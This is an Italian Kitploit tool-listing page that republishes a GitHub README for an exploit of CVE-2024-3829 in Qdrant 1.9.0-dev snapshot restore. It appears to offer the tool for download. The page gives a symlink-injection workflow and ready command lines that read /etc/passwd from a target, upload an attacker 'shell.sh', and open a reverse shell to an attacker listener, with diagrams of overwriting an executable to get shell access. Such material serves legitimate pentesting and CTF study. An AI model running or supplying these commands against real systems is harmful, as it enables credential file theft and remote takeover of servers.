Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3829 — CVE-2024-3829 | Kitploit
Strumenti/GitHubGitHub/fabse-hack/cve-2024-3829
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingSviluppo Payload
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

CVE-2024-3829

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3829 per Qdrant - Exploit

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

Questo repository documenta e dimostra CVE-2024-3829 per qdrant/qdrant (v1.9.0-dev)

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • Ulteriori informazioni e idea per questo repository:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

Supporto e donazioni

Paypal:

Buy Me a Coffee:

Panoramica

La vulnerabilità consente la manipolazione degli archivi di snapshot tramite trucchi con symlink/percorsi. Ciò abilita due classi di impatto e una reverse shell hahhaa:

  1. Lettura di file
  2. Scrittura di file
  3. Esegui reverse shell

A seconda dell'ambiente, le primitive di scrittura file possono portare all'esecuzione di codice.

Software interessato (vedi il link NVD)

  • Prodotto: Qdrant
  • Versione: 1.9.0-dev
  • Componente: Snapshot Import/Export

Nota sul numero di versione:

Questa versione non è più disponibile nel world wide web (alcuni lo chiamano "internet").
Nel repository di qdrant, il report NVD Nist indicava il commit, che è la v1.9.0-dev vulnerabile.
Se vuoi installare questa versione per CTF / altri scopi su un docker, usa:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

Flusso di lavoro (Semplificato)

  1. Crea una collection
  2. Genera uno snapshot
  3. Estrai e modifica lo snapshot localmente
  4. Inietta un symlink nell'archivio target di lettura/scrittura
  5. Carica lo snapshot modificato
  6. Attiva il ripristino dello snapshot
  7. Valuta il risultato leggi contenuto file / scrivi file / esegui reverse shell

Contenuto del repository

  • cve_2024_3829.py - Exploit per il flusso di lettura/scrittura/trigger
  • requirements.txt - Dipendenze Python

Requisiti

  • Sistema Kali Linux consigliato
  • Python 3.10+
  • Server Qdrant in esecuzione per test locali
  • Pacchetto Python requests

Installazione:

root@kitploit:~
python3 -m pip install -r requirements.txt

Utilizzo

Mostra tutte le opzioni:

root@kitploit:~
python3 cve_2024_3829.py -h

Esempi:

root@kitploit:~
# Read mode
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# Write mode
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# Reverse shell mode
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

Parametri disponibili

  • -h, --help: mostra l'aiuto della CLI
  • -m, --mode: uno tra read, write, reverse_shell (obbligatorio)
    parametri del target:
  • -tu, --target_url: URL base di Qdrant (default nello script)
  • -tp, --target_port: porta del target Qdrant (default: 6333)
  • -tpath, --target_path: percorso remoto del target (default: /etc/)

Note

  • --target_url dovrebbe essere l'URL base senza la porta finale se passi --target_port separatamente, perché lo script costruisce gli URL come <url>:<target_port>/....
  • In modalità read, lo script combina --target_path e --target_file_name (ad esempio /etc/ + passwd).
  • In modalità write, --attacker_path deve puntare a un file locale esistente e --attacker_file_name definisce il nome remoto del file.
  • Per test di rete attraverso i confini Docker/WSL/host, verifica prima la raggiungibilità (ad esempio con netcat) prima di eseguire la modalità trigger.
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
Scarica lo strumento
  • -tf, --target_file_name: nome del file remoto del target (default: passwd)
    parametri dell'attaccante:
  • -ai, --attacker_ip: IP di callback/listener per la modalità reverse shell
  • -ap, --attacker_port: porta di callback/listener (default: 9001)
  • -apath, --attacker_path: percorso locale del file dell'attaccante per la modalità write (default: /tmp/)
  • -af, --attacker_file_name: nome del file utilizzato sul target in modalità write (default: shell.sh)